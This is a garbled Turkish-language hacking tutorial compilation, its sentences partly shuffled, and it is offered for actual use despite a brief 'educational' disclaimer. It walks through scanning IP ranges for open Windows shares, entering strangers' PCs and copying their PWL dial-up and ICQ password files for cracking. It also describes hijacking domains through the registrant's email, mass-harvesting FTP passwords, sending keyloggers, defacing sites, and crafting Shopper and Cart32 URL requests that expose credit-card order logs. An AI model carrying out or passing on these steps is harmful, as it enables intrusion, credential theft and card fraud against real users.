e. MANUEL YÖNTEMLE PWL ŞİFRESİ ALMA MANUEL YÖNTEMLE PWL ŞİFRESİ ALMA GEREKLİ PROGRAMLAR .Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina eklediklerimizi networkumuze tanitiyoruz. Bizim icin önemli olan da bu. BU DURUMDA PC İÇ ŞİFRELİ DEMEKTİR. ^MOREBID bilgisayarin adi) d. NBTSTAT İLE KARŞI PC Yİ TROJANSIZ ELE GEÇİRMEK Dos komut satirinda nbtstat -A <IP adresi> komutunu veriyoruz. Burada ^MOREBID bilgisayarin ismidir.NOT : BAZI BİLGİSAYARLARADA GİRMİŞ GİBİ GÖRÜNÜR FAKAT C D VB SİMGELER GÖREMEZSİNİZ.Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz.x. Baslat/Bul/Bilgisayarlar menusunden UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE Registered satirindaki Unique) bilgisayari aratiyoruz.x. c. Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik olmasi durumunda calisir. Bilgisayar seklinin uzerine cift tiklayip harddiskini görebiliyoruz.Simdi Windows'a dönme zamani. Basarili Olmussak: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------^M0REBID <00> UNIQUE Registered VIRTUAL COMPUTE<00> GROUP Registered ^M0REBID <03> UNIQUE Registered MAC Address = 44-45-53-54-00-00 gibi bir cikti almamiz gerekir.x IP adresi.x ^MOREBID satirini eklemek (x. Bu islemler yaptiktan sonra bilgisayar bulunuyor.x. ("Edit lmhosts" komutuyla) Eger ki daha önceden lmhosts dosyasi varsa bile yapacagimiz is: x.x.

bana ttnet şifresi falan istemezsiniz herhalde:))) Kendi işini kendin göreceksin. Bu programların hepsinin kullanınımı ayrıntılı bir biçimde anlattım diğer bölümlere bakınız bu programlar vasıtasıyla c dizinini açık bulduğumuz bilgisayarlar dan ıcq şifrelerini almaya başlıyoruz.255 yazıyoruz ve starta basıyoruz paylaşıma açık ve kapalı bilgisayarlar listelenmeye başladı yes olanların üzerine tıklıyoruz daha sonra sağ tuşa basıp opencomputeri seçiyoruz biraz bekledikten sonra karşı bilgisayarla bağlantı kurulmuş oluyor.25. Şimdi gelelim adamın icq şifresini nasıl alıcaz.Bu sefer Konuma Konum : \\212.175. kırmızı yazıyla pwl yazan dosyaların üzerine iki kez tıklıyoruz pwl tool otomatik olarak bütün şifreleri önümüze getiriyor. c dizini açık bilgisayarın ip numarasını:mesela(195. Karşı bilgisayarın c dizinini açık gördüysek.1-Essantial net tools veya r3x 2-pwl tool programı Öncelikle ağ ayarlarımız aşağıdaki gibi olması gerekiyor ağ ayarları detaylı anlatımı angry ip scan bölümünde var Microsoft ağları için istemci Çevirmeli Bağdaştırıcı IPX/SPW uyumlu iletişim kuralları NetBEUI TCP/IP BİRİNCİL AĞ OTURUM KISMINA İSE Microsoft ağları için istemci ayarlarını yapıyoruz. evet tespit edilen şifreleri tümünü seç diyoruz daha sonra kopyala diyoruz kopyaladıkdan sonra deskopa yani masa üstüne gelip yapıştır diyoruz biraz bekledikten sonra bütün pwl dosyaları masa üzerine kopyalanıyor. Enderde olsa bazı pwl dosyaları boş çıkabilir. Çok kısa bir zaman içinde windows dizininde bulunan bütün pwl dosyaları alt tarafa teker teker listeleniyor.1 Ending ip adres bölününe bitiş ip no 195.222.175.255) BAŞLAT/BUL/DOSYALAR VE KLASÖRLER E GELİYORUZ AD KISMINA: *.175. Ad: *.222.dat yazıyoruz ve yine bekledikten sonra önümüze çok sayıda dat dosyası çıkıyor bunlardan sayılı olan yani 123456.Sonra icqcrack programını .123456tmp. sıra geldi pwl dosyalarını almaya.Bunun için yine Başlat>Bul>Dosyalar ve Klasörler'e giriyoruz. Bazılarında aradığımız dialup şifreleri olmayabilir. bana süper şifresi . kesinlikle başkalarına dosyalarıma erişim hakkı verebilmek istiyorum seçeneği işaretlenmiyor boş bırakılıyor.pwl yazıyoruz KONUM KISMINA:\\195.dat gibi olan dosyayı çekiyoruz.253. Bazılarında ise 10 tane birden şifre çıkabilir ne çıkarsa bahtına ama genelde mutlaka çıkar. 195.222. 5-KARŞI PC NİN PWL DOSYALARINI ALMA: evet c dizinini açık gördüysek dedik.dat ı çekmenize gerek yok.14\c\Program Files\ICQ\ yazıyoruz. 4-Essantial Net Toolsu kurduktan sonra Nbscan kısmında Starting ip adres bölümüne başlangıç ip no.222. Hadi bakalım kolay gelsin MANUEL YÖNTEMLE ICQ ŞİFRESİ ALMA ister essantial ister rx3 ister angry ip scan programları vasıtasıyla kullanıma açık bilgisayarları tespit ediyoruz. Eeee artık bu anlatımdan sonra ikide birde bana şu saatler arası şifre.175.255\c\windows\ yazıyoruz şimdi bula basıyoruz.

cgi Mesela girdik "http://www.s.. Emre emrebuyukyogurtcu@hotmail.com plaza 1/1 . (sadece info bölümünü yazıyorum buraya ) NOV-01 Expires on: 07-NOV-02 Last Updated on: 07-NOV-01 Administrative Contact: Buyukyogurtcu.açıyoruz(Advanced ICQ Password Recovery) dosyaya basıyoruz 123456. Kısaca hatırlatacak olursak bir icq uinini çalmak istediğimizde ilk öncelikle onun infosuna bakarız.comBu mail adresi spam botlara karşı korumalıdır.dat dosyasını seçiyoruz ve hooop işte adamın icq passwordu.com/password adresinden mailini ele geçirdiğimiz uinin şifresini o uinin mailine yollatıp kolaylıkla şifreyi alırız.Bunu hepimiz biliyoruz yani bir icq'nun mailini aldıktan sonra şifreyi e-maile yollatmayı.org/cgi-bin/whois.opensrs.com/domain...php3" hangi domaini hacklemek istiyoruz atıyorum kacak.arama.com/domain.com (aklımda şuan bu var maili hotmail olan) Kacak. Bir icq uinin infosuna bakmak için icq dan o uini aratırız ve o kişinin ismini. istanbul 12345 TR +901234567891 +901234567891 Technical Contact: Buyukyogurtcu. Emre emrebuyukyogurtcu@hotmail..arama.Size bir kaç whois çekebileceğiniz adres vereyim mesela http://www.. soyismini e-mail adresiini v. görebiliriz.icq..com u arattığımızda karşımıza şu bilgiler çıkacak..com plaza 1/1 istanbul.Şimdi hacklemek istediğiniz domaini ilk öncelikle bir icq uin olarak düşünün. görebilmek için Javascript açık olmalıdır kacak.comBu mail adresi spam botlara karşı korumalıdır.php3 mesela http://www. Şimdi size domain hacking olayının Icq hack olayınla kesiştiği noktayı anlatacam. ICQ HACKLER GİBİ DOMAİN HACKLEMEK ICQ uin çalmanın genel mantığını artık hemen hemen herkez biliyor.E-maili yazılımı diye eğer e-mailı yazılıysa ilk önce o maili hacklemeye çalışırız eğer ele geçirirsek http://www. görebilmek için Javascript açık olmalıdır kacak. Bu yöntem domain için de geçerli yani bir domain'in bilgilerini görmek istiyorsak ona whois çekeriz yani bir nevi infosuna bakarız.

görebilmek için Javascript açık olmalıdır 'a yollatabiliriz.EASYDNS.EASYDNS.com a girip orada " şifremi unuttum " sayfasını bulup şifreyi e-mailımıza yollatabiliriz.EASYDNS.COM Registrar: DOTSTER..com/help/whois Name Server: NS1. görebilmek için Javascript açık olmalıdır " bu domain'e ait mail. adım yine icq şifresini yollatır gibi o domainin şifresini maile yollatmak.COM Name Server: REMOTE2.COM Name Server: NS2.. INC. INC.COM NS2. (Şifremi unuttum gibi.COM Name Server: REMOTE1.istanbul..com Kısmına bakarsanız bu domain'in DOTSTER diye bir şirket tarafından register edildiğini göreceksiniz. istanbul 12345 TR +901234567891 +901234567891 Domain servers in listed order: NS1.comBu mail adresi spam botlara karşı korumalıdır. Whois Server: whois.dotser.com Referral URL: http://www..dotster.dotster.EASYDNS. NOT: Bu yöntemi icq uin hacklemek için de kullanabiliriz yani bir icq uinin nun infosuna bakıp e-mail adresinde atıyorum ahmet@mehmet. Şimdi http://www.com/password gibi sabit bir adresi yoktur yani bütün domainlerin şifrelerini bir adresten yollatamayız.comBu mail adresi spam botlara karşı korumalıdır.EASYDNS.EASYDNS. Eee ne demek peki bu ?? Bu demektir ki bu maili hacklersek biz kacak.COM Evet gördüğünüz gibi " emrebuyukyogurtcu@hotmail. Whois Server: whois. Peki domain'in hangi şirketten alındığını nasıl anlayacaz ? Yine domain'e whois çektiğimizde karşımıza şöyle bir bilgi çıkıyor Domain Name: KACAK.) Diyelim hackledik yapacağımız 2..EASYDNS.dotster.com domaininin şifresini emrebuyukyogurtu@hotmail.comBu mail .COM Updated Date: 07-nov-2001 Registrar: DOTSTER.EASYDNS. E peki nereden yollatacaz ?? Domainlerin www. Şifreyi yollatmak için illaki o domainin registerlandığı şirketin web sitesine girip oradan yollatmalıyız.COM REMOTE2.icq.COM REMOTE1.

HALLET: Hallet Programı için Rx3 programı vasıtasıylo eğer programınız elinizde yoksa indir: download bölümünde essantial de olabilir My Webpage belirli bir aralığı taratarak share bilgisayarları tespit ediyoruz ve hallet programınının ip bölümüne giriyoruz. YAPILACAK İŞLEMLER BÖLÜMÜNDE HEPSİNİ İŞARETLİYORUZ VE İŞLEMİ BAŞLATA BASIYORUZ çok kısa bir zaman dilimi içinde share kullanıma açık bilgisayarlardan bir sürü pwl ıcq nadirde olsa ftp şifrelerini tespit ediyor ve belirlediğimiz klasöre kaydediyor. :)) Hotmaili hackleriz mehmet. HALLET PROGRAMI: Öncelikle ayarlar bölümünde kaynak paylaşım c olarak kalacak hedef dizin pwl dosyalarının bilgisayarımıza kopyalanacağı adres örnek c dizininde klasör oluşturalım ve adını pwller koyalım. İKİ ADET MÜTHİŞ PROGRAM ŞİFRELERİ PROGRAMLAR KAYDETTİ NASIL AÇACAĞIZ .. PROGRAMLARI NASIL KULLANIRIZ. keylogger göndermek isteniyorsa keylogger göndere basıyoruz keylogger gönderiyor keyloger txt indir dediğimiz zaman gönderdiğimiz keyloggerleri okuyor yanlız karşı pcnin yazmaya ve silmeye karşı güvenliği olmaması gerekir.com un maili hotmail.Hallet programının en önemli özelliklerinden biri dizin görüntüleyle karşı pcye seri bir biçimde dalması yani bilgisayara girer. Manuel yöntemle öğrenmek çok önemliydi. bu porgramın dosya gönderdiğini ben görmedim sanırım o bölümünde sorun var ama genede yazmak isterseniz göndermek istediğiniz bir dosya ismi yazabilirsiniz veya aynen kalabilir ayarlarımızı yaptık TARAYICI MODUNA GELİYORUZ VE BİR İP ARALIĞI YAZIYORUZ ÇOK BÜYÜK ARALIKLAR VERMEYİN BİLGİSAYARI KİLİTLEYEBİLİYOR EN FAZLA 15 İP ARALIĞINDA KALSIN PORT KISMINI 1243 YAZABİLECEĞİMİZ GİBİ 139 DA YAZABİLİRİZ.com a whois çekeriz bi bakarız aaa mehmet. Yine gideriz mehmet.comBu mail adresi spam botlara karşı korumalıdır. Çünkü hack olayında ezbere iş yapmak pek iyi değildir olayın mantığını kavramak önemli. görebilmek için Javascript açık olmalıdır şeklinde bir mail yaratıp o icqyu çalabiliriz :)) HOUND VE HALLET GIBI SÜPER PROGRAMLAR VASITASIYLA PWL ICQ VE FTP SIFRELERINİ ELE GEÇİRME GEREKLİ PROGRAMLAR: HOUND PROGRAM HALLET PROGRAMI PWL TOOL PROGRAMI ICQCRAK PROGRAMI Evet arkadaşlar daha önce manuel olarak pwl ve ıcq şifrelerinin nasıl ele geçirileceğini anlatmıştık. yahoo gibi değil nasıl hackleriz diye düşünürüz ??.adresi spam botlara karşı korumalıdır.com u üzerimize geçiririz ve ahmet@mehmet.. HEDEF DİZİN: c:\pwller olacaktır. görebilmek için Javascript açık olmalıdır görürsek hemen vaz geçeriz çünkü hotmail. Bulamazsa sesli mesaj verir bulurken daha değişik sesli mesaj verir FTP indir:karşı pcde varsa ftp şifserelerini bulur ve kopyalar. PWL İNDİR: Çok kısa bir zaman içinde bütün pwl leri bulur ve ve kendi klasörüne ip numaralarına göre kopyalar halletin bu özelliği mükemmel.

Özellikle gerçekten bilimsel anlamda bilgisayar sektörü ile ilgilenmemişseniz. Bu zamana kadar hiç site hacklemedim site hacklemek istiyorum diyenler için en basit hack yöntemi budur GENEL WEB HACK YÖNTEMLERİ VE GÜVENLİK YOLLARI --. Daha önceden kendimize göre hazırladığımız bir index. Her saldırganda bu kriterler .data dosyasını bulduk.175.pwl şifrelerinin üzerine iki kez tıklarsak pwl tool programı hemen önümüze geliyor searchPasswordFast butonuna basıyoruz hoop bütün şifreler önümüzde. Kural : Hiçbir Hacker yada Saldırgan. tecrübe ve şans kriterleri ile o açığı bulur ve kullanır. bilgi. o saldırgan.255 bu ttnet ip aralığırdır siz daha başka iss ip aralıkları taratabilirsiniz. İmporta tıklıyoruz importtan belgelerime geliyoruz belgelerimdeki sm.Tarayıcı modunda FTP yi işaretliyoruz ve yoğun ip aralıklarından birini veriyoruz mesela Türkiyede en yoğun ip aralığı 195. KOLAY GELSİN HOUND PROGRAMIYLA WEB HACK hound programı ayarlara geliyoruz Hedef Dizin:c:\Belgelerim yazıyoruz diğer hiç bir ayarla oynamıyoruz çarpıya basıp çıkıyoruz.175. aç diyoruz aç dediğimiz anda cute ftp programına o siteyle ilgili tüm bilgileri döktü. Bu kadar basit. ve siteyi istediğimiz biçimde hackliyoruz.adresi site ftp şifresi. yetenek.Bilgisayar Bilimde Güvenlik Ana Bilim Dalı --Yazıma başlamadan önce size bazı gerçeklerden bahsetmek istiyorum. PEKİ ICQ ŞİFRELERİNİ NASI AÇACAĞIZ ICQcrack porogramını açıyoruz.255. 1.Ve web sitesiyle ilgili şifreler mevcuttur. Evet sm. İstersek bu siteyi anında hackliyoruz. Şimdi cuteftp programını download ediyoruz F4 basıyoruz önümüze import diye bir menü geldi.data diye bir dosya kaydetmişmi. Connecte basıyoruz ve o siteye bağlanıyoruz.datanın üzerine bir kez tıklıyoruz. O tamamen sizin insiyatifinize kalmış. bu söyleyeceklerim sizin için altın değerinde olacaktır. İstersek hostunu smartvhois le hostunu bulup ftp şifresini değiştiriyoruz. İp tarama bittikten sonra belgelerime bakıyoruz sm.1 195.50. sihirbaz değildir.dat dosyasıdır. Eğer böyle bir dosya kaydetmişse o dosya ftp.htm dosyasını siteye yüklüyoruz. Site ftp. Sitenin içeriğini ister siliyoruz ister silmiyoruz. Bir şekilde var olan bir açık varsa.En soldaki buton openICQ dadabase ye basıyoruz ıcg şifrelirini c:\pwl ler dosyasına kaydetmiştik hemen c yi arattırıp o dosyayı buluyoruz karşımıza open file geldi open feledeki ICQ numarasının üzerine tıklıyoruz aç diyoruz hooppppp ICQ ŞİFRESİ HATTA VE HATTA KULLANDIĞI VERSİYONU KARŞIMIZDA evet arkadaşlar bu programlar vasıtasıyla dial up ve ıcq şifre elde etmek çok kolay ve kısa bir zaman içinde yüzlerce pwl ve ıcq şifreleri elde edebilirsiniz.

Eğer siz kendi bilgisayarınıza bu işletim sistemlerinden birini kurup.org kısmı domainin hangi level olduğunu belirtir. irc server gibi şeyler kurabilirsiniz.. Az önceki cümlede “Paylaşım” denilen birşeyden bahsettim. yaptığınız işlerde ve yapacağınız yorumlarda bir çok şeyi kolayca elde edersiniz. *. İnternet ortamı. farklı protokoller üzerinden birbirine bağlandığı. “Spymastersnake. belli bir ipsi olan ve içinde internette yayınlanacak dosyaları barındıran. Eğer ki bunların doğru olduğunu bilerek düşünürseniz. Şimdi kısaca internette bir web sitesi için gereken birimlerden bahsedeceğim. makinanızı ayarlarsanız bu makine sizinki bile olabilir. Yada şu anda geocities gibi . biribirinden bağımsız kullanabilecekleri bir bilgisayardır. Bu IP ise bir bilgisayara ait olan. Bu kurallar gerçekten altın niteliğinde. Kural : Tamamiyle güvenli sistem diye birşey yoktur. satırlarımı doldurmak için değil. ve o bilgisayarın internete erişimini sağlayan numaradır. ineternette bulunan her bilgisayar bir paylaşım içindedir. Bu hesap sizin dosyalarını koyabileceğiniz bir hesaptır. Bunu söylememin sebebi. Her internete bağlanan makinaya verilen ve birbirinden farklı olan bu numaraya. bazılar için ise atak karşı tafa büyük hasarlar verir. 3.. domainin gösterdiği Ipdeki www klasör veya hizmetinin yoludur. Kural : Güvenlik işinde garanti yoktur. 2. www. Bu hesap sayesinde size izin verilen şeyleri yapabilirsiniz. www. aldığınız yer size bir bilgisayarda hesap açar. bir çok bilgisayarın. büyük bir paylaşım ağıdır.spymastersnake.org bir TopLevel domaindir.* kısmı ise. Evet. internet protokolü numarası denir.org” kısmı domainin adıdır. Domain Name her zaman bir Ipnin yerini alır.aynı olmayacağı için bazıları için atak başarısız olur. Bu makinalarda web sunucusu dediğimiz programlar bulunur. Host: İnterenete sürekli bağlı olan. Örneğin. Örneğin izin verilen miktarda dosyalarınızı koyabilir. Burdaki önemli bir şeyi vurgulamak içindir. Domian Name: Alan adıdır. Bir web sitesi aldığınızda. multi-user işletim sistemi barındıran ve farklı kullanıcıların. Bu programlar sayesinde sizin herkese paylaşıma açacağınız internette yayınlayacağınız sitenin dosyalarını 80 numaralı port üzerinden yada başka bir port üzerinden web tarayıcılarının okuyabileceği şekilde yayınlanabilir. yayınlayabilir veya karşı makinede dosyalarınızı çalıştırabilir.

Bazı scannerlar. insanların Hack ettim diyerek övündüğü basit ve karmaşık olmayan sistemleri açıklamakta. Bunların başlıcaları şunlardır: 1. bazı normal *. Oldukça kolay ve basit birşeydir. yayınlanmasını sağlayabilirsiniz. onların paylaşım izni olup olmadığını ve ftp gibi protokolllerinde erişim izinlerine Anonymous kullanıcılara izin verip vermediğini kısa zamanda tarayıp bulan scannerlardır. bunlarla oyun serverları. Bir host içinde yüzlerce kullanıcı ve buna bağlı olarak yüzlerce web sitesi barındırabilir. Ancak gerçekte durum daha Complex bir haldedir. Aynı şekilde size verilen bir hesapta. Mass Scannerlar: En yaygın olanı son dönemde budur. sınırlandırılmış bir *. bir web sitesi için gereken bir server yazılımı ve internete bağlı bir bilgisayar diyebiliriz. adına web sunucusu yada host demiş oluyoruz. Bunun böyle olması sağlayan şey ise Domain Name Server dediğimiz sistem ve Multi-User dediğimiz. Belli bir yorumlayıcısı vardır ve tüm görevleri bu yorumlayıcı yapar. Netbios ve Vulnerability scanner diye bir kaç türleri vardır. Kullanıcının bilgili biri olması gerekmez. Bir script. Yani bu web yayımcılığının en temel ve basit işini yapmış olursunuz. Bir mass scanner çok iyi Up ve Down stream bağlantıya . PHP ve Perl yorumlayıcılarıdır. Bu complex yerleşim ise bu sistemleri iyi bilen kişiler için bazı avantajlar sağlamakta ve başkasının sahip olduğu sistemlere bile onların istemleri dışında hükmetme şansı vermektedir. Kısaca bilmeyenler için. Bunlarla mesela. Ancak web yayımcılığı daha karmaşık ve daha çok şekilde yapılabilmekte. internette bulunan Alış-Veriş scriptlerinin bilinen açıkları veya Permission ayarları hatalarıyla kredi kartları bilgilerine ulaşım yapılmaktadır.exe uygulaması gibi çalışır. Tek yapacağı ip aralığını girip tarama yapmasıdır. Bu yüzden yaptığınız uygulamanın sınırları bu yorumlayıcının yeteneklerine bağlıdır. Böylece internete bağlı bir bilgisayarı bazı server uygulamaları sayesinde internette bilgi paylaşabilen bir sistem haline getirip. işletim sistemleridir. Aynı şekilde scriptlerdeki açıkları ve hataları bulmak hazırlanmış scannerlarda vardır. chat serverları kurabilirsiniz. Bunları sağlayan şeylerin başında script dediğimiz. Bilinen en yaygın yorumlayıcılar ASP. web browserlarından yollanan komutlarla karşı makinada çalışan uygulamalardır. Elbette bu aldığınızın hostun yeteneklerine bağlıdır. Şimdi kısaca şu anda Türkiye’de Hack adı altında dolaşan. Scriptte ise bu yorumlayıcının anlayacağı komutlar vardır.exe uygulamaları yada ortamına göre sadece uygulama çalıştırabilir. internetteki ipleri yani bilgisayarları tarayarak.yerlerin yaptığı sadece dosyalarınızı depo edip.

2. Fake Yollarla: Özellikle bedava siteler dağıtan geocities gibi yerlerden sitesi olan kişilerin sitelerini çalmak için kullanılan yöntemdir. forumun anasayfasını değiştirme. DSL ve Tx bağlantılar biçilmiş kaftandır. Diğelim bu 1000 siteyi hack etmiş adama 1 site adresi verseniz onu hack edemediğini görebilirsiniz. açacağınız yada alacağınız bir hesapla. Script Açıkları: Bilinen scriptlerin açıklarıyla. hepsine yapmış ve aynı anda yüzlercesini hack etmiş olursunuz. Bu verdiğim örnek bile en azından yetenek isteyen bir örnektir ancak yukarıda verilen tool örneği herkesin yapabileceği ve hali hazırda tüm hack sitelerinin kullanıcıların gözünü boyamak ve kendilerini tatmin etmek için kullandıkları yöntemdir. Bu işi eğer hostta 1000 site varsa. belli Amerikan IP aralıklarını tarama yapar ve içinde açıkların olduğu siteleri bularak işlemi yapar. Unutmayın ki bu iş sihirle yapılmıyor. sistemi hack edilmiş havasına sokabilirsiniz. içinde yüzlerce hesabın bulunduğun bir Host’un açığını bulup. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan kişilerin yolu veya karşısındaki user’ı bilgisi az olunca denen yoldur. Size mantığı açıklanmamış hiçbir hack girişimini gerçek sanmayın. 3. belki hack edilen sitelerin adını kendi bile daha önceden duymamıştır. Eğer internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi şeyler görürseniz. Kişinin mail adresine sahte şifre isteyen mailler yollanır yada user’ın hesabında şifreler denenir. bu şifreyle sistemin diğer yerlerine ulaşıp. Örneğin bir forum scriptinin admin şifresini ele geçirip.. Admin konumuna yada yetki düzeyi olacak bir konuma erişmiş ise tüm hesapları kitleyebilir yada hesapların indexlerine erişim varsa. Buda çok kullanılan bir yöntem. Bunun için atak yapan şahıs. sistemdeki bir şifreye ulaşarak yapılan yöntemdir. İnternet kafe gibi ortamlarda user ve oturduğu makineleri takip ederek şifreyi almaya çalışır. Root. şifre FTP şifresiyle aynı ise siteyi .ihtiyaç duyar. Özellikle bu hack edilen sitelerin bir ortak yanı olmaz. bir script yazmanız yada hostun işletim sistemine göre bir uygulama yazmanız sonucunda. Bilgisayar bilimi hakkında bilgisi olmayan kişiler ise bu insanların arkasından gitmeye çalışmakta ve onların ağlarına düşmektedirler. Böylece saatte bağlantı hızına göre 1000 Amerikan sitesi hack edebilir.. tüm klasörlerdeki indexleri değiştirip. Çünkü kendi rastgele belli ip aralıklarını tarayarak bu işi yapmıştır. Diyelimki sadece Amerikan sitelerini hack edicek biri. Başka bir şekilde de saatte yüzlerce site hack etmek mümkündür. Ancak bu sitelerin çoğu uyduruk kişisel siteler olacaktır yada kendi çabasıyla hosting hizmeti vermeye çalışan deneyimsiz insanların siteleri olacaktır. Amerikan hostlarının bulunduğu ve bulunabileceği. Hiç bişey yapamayan lamer siteyi şikayet etmekte bulur çareyi. Diyelim ki permission ayarları yapılmamış ve tüm kullanıcılarının Home klasörleri chmod 777 gibi bir izinle hazırlanmış bir hostta. hazırlayacağı ufak bir uygulama ile tüm indexleri değiştirebilir. bunların Mass toolarla sadece butonlara basılarak yapıldığını rahatlıkla söyleyebilirsiniz. Eğer User ile bir chat ortamında bağlantısı varsa ona bir Trojan yada Keylogger yollayarak şifreyi almaya çalışır.

bilinen ve hala kullanılan yöntemlerdir. Bazı web siteleri bile bu yöntemlerle hack ediliyor. Programı bulduktan sonra ise ona bazı parametreler girerek onun log dosyasını bulmak.. Onun hack edilmesi daha kolay. bunu http://www. bunun için her zaman otomatik print yapan search tagını kullanıyoruz.exe olarak scripti bulduğunuzda. www..log yazıyoruz ve tatam. yada direkt ? search de olabilir bunu bilmeyeiz bu yüzen deniycez. Yukarda anlatılırken kullanılan taglar değişebilir.com/cgilocal/shopper?search=action&keywords=yeye %20&template=order. ?search=actin yerine ?action=search olabilir.xxxx. Karşınıza CClerin girildiği form alanı gelince kaynağı görüntüleyip. Bunlar için bir örneği 2001 yılında yazıp yayınladığım kredi kartlarının çalınması ile ilgili bir yazıdan alıntı yaparak vermek istiyorum bu örnek Permission açıkları ile ilgili bölüm içinde geçerlidir...log Şu ana kadar anlattığım Shopper.xxxx.log yazıyoruz deniyoruz.ele geçirme gibi. Deniyoruz ve tabii ki olmuyor çünkü sales. olmazsa sell.log ise aranacak olan döküman.log yerine sale. Şimdi LOG'u bulmaya çalışcaz. Şimdi.michaeljackson. Bunun için asıl karışık olan kısmı yapıcaz ve yapılan alışverişlerin nerede LOGlandığını bulucaz.exe gibi windows için hazırlanmış olan scriptin açığı var. eğer URL yerinde "/cgi-local/shopper" yazıyorsa başına sitenin adresini koyun..xxxx. kolay.log yok. arama yapmamızın nedeni. Mesela keywords yerine keyword de olabilir..com/cgi-local/shopper?search=action bu sayede scriptten bir arama yapmasını istiycez..xxxx.log diyoruz.com daha sonra URLyi browserınızın git çubuğuna yapıştırın.com/cgi-local/shopper linkini POST verisinin yollanacağı yerde buldunuz.. Mesela. İşte bu durumda devreye zeka giriyor ve denemeye başlıyoruz. Sonuç URL www. içindeki POST methodunun bulunduğu yere bakın. Tabii ki arıycak ama ne? tabii ki ufak bir keyword. Bunun üstüne bir keyword girdisi ve üstüne de aranacak harfleri giriyoruz www. http://www.com/cgi-local/shopper? search=action&keywords=yeye şu an yeye yazdık ve yeye kelimesini aratmaya başladık ama nerde.txt yada . ilk önce bu adrese şu TAGları ekliycez.Cart32 kullanan bir sitede http://www. ilk iş kıytırık ama CC ile alışveriş yapılan bir site bulmak ve bu sitenin CC verilerinin girildiği alana gitmek..xxxx. Diyelim ki şu an zaten çalışan ve aktif olan http://www.. İşte o zaman bu durumda şans dileyip şunları deneyin: Orda yazan URLyi kopayalaın. Bu yöntemde zor olan tek bir yer var o da CClerin hangi program tarafından alınıp log edildiğini bulmak. yada şöyle diyim.Cgi için olan açıktı.İşte Log Kurulumlarından doğan açıklardan çıkan riskler... oldu İşte bütün log karşınızda.: “. Birde Cart32.com/cgibin/cart32. bütün log değil yanlızca içinde yeye kelimesi olanlar karşınızda. Yapılması gereken şey scripte bazı parametreler girerek istenene ulaşmak.xxxx.com/cgi-bin/cart32/herhangibisi-ORDERS. olmazsa order.michaeljackson.log yazıyoruz. Burdaki %20 boşluk anlamına. log'u görüntülemek için başka şansımızın olmaması. Zor değil.com/cgi-local/shopper?search=action&keywords=yeye %20&template=sales.. O zaman devam ediyoruz ve oraya sales. yani http://www. Çünkü log'u print edecek bir girdi giremiyoruz. template ise aranacak kütüphane anlamına geliyor ve tabii ki sales.

Daha sonra sağ tuşa basıyoruz ve Open Computer i seçiyoruz. Öncelikle ağ ayarlarımızı yapmamız gerekiyor. Öncelikle Angr ip scan açıklamasındaki ağ ayarlarını resimdeki gibi aynen yapıyoruz. ESSANTİAL NET TOOLS KULLANIMI Essantial net tools kullanıma açık share bilgisayarlara kolayca girmek te kullanılan bir programdır. nosunu yazıyoruz. Starta basıyoruz ve kullanıma açık ve kapalı bilgisayarlar listelenmeye başlıyor. Bilgisayarlara girebilmemiz için sadece bu programı download etmemiz yeterli değil. . açılıncaya kadar beklememiz gerekiyor.txt olarak girerek CClere ulaşabilirsiniz. Bu tür diğer programlara göre hem daha seri hemde herkes kolaylıkla bu program sayesinde share bilgisayarlara girebilir.Aşağıdaki resimde görüleceği üzere NB Scan bölümünü seçerek aşağıdaki starting ip adres bölümüne başlangıç ip no. Hahahahahahaha. nedense canım birden gülmek istedi.RS yazan kısımda Yes olanların üzerine tıklıyoruz.su Ending ip adrez bölümüne ise bitiş ip. Tam kullanım vermiş başlıyoruz bilgi paylaşımına. <!--[if !vml]--> <!--[endif]--> karşı bilgisayarla bağlantı kurulduğunda aşağıdaki resimdeki gibi c d simgeler ekrena gelirse ne ala c nin üzerine iki kez tıklıyoruz ekran donmuş gibi oluyor.5 saniyelik bir beklemeden karşı bilgisayarla bağlantı kurulmuş oluyor. Ağ ayarlarının nasıl yapılacağı Hack bölümü Angr ip Scan kullanımı bölümünde resimli ve ayrıntılı bir biçinde açıklandı.OUTPUT. Tabii dediğim ORDERS başka bişi de olabilir ama genelde orders dır. No yazanlarla hiç uğraşmıyoruz çünkü kullanım verilmemiştir.

Uyarmak ise çok şey kazandırır. Bazılarında sadece mesala mp3 download veya dinleme için izin verilmiş olabilir. bazılarında hiç bir şey görünmez pc iç şifrelidir. Kimse zarar vermekle uğraşmaz. Bazılarında sadece yazıcılara paylaşım vermiştir. Bilinçsizce bilgisayarını kullanıma açanları lütfen uyarınız. Bizim için önemli olan bilgi paylaşımıdır. Burada verilen bilgiler eğitim amaçlıdır.<!--[if !vml]--><!--[endif]--> <> bazı bilgisayarlarda c d dizinleri görünür çift tıkladığınızda karşınıza şifre ekranı gelir. Lütfen bu söylediklerimi dikkate almıyorsanız bu siteyi terkediniz.Sadece bilgi alışverişinde kullanırlar. Zarar vermek size hiç bir şey kazandırmaz. Bazılarında bilerek veya bilmeyerek tam yetki verilmiştir. Avrupadaki pc lerin çoğu kullanıma açıktır. COMMVIEW PROGRAMI .

Örneğin o anda sitenin kullandığı ipadresileri ve portları eğer oyun sitesi üzerinde açtıysanız serverin müsade ettiği sınırlar dahilinde kişilerin konuşmaları. <!--[if !vml]--> <!--[endif]--> . ip numaraları ve daha birçok bilgiye ulaşabilirsiniz. programı çalıştırmak için filenin altındaki simgeyi tıklayın program çalışmaya başlar.Kullanımı gayet basit olup hangi sitenin üzerinde açarsanız açın o site hakkında bir çok bilgilere erişebilirsiniz. Programın o an tespit ettiği tüm bilgiler karşımızageliyor. Programda birçok özellik bulunmasına rağmen sizin için daha çokönemli olan kısmı PACKETS bölümüdür . Resimdede görüldüğü gibi TCP/IP lerin üzerinegelerek tıklıyoruz ekrandakilerin tamamını tıklayarak seçiyoruz (seçebildiğimiz kadar) seçtiğimiz kısmınüzerindeyken sağ tuşa tıklıyoruz ekrandaki küçük pencerede görüldüğü gibi saReconstruct TCP sessioun u tıklıyoruz.]--> <!--[endif]--> CommView porogramının bir çok özelliği mevcuttur.

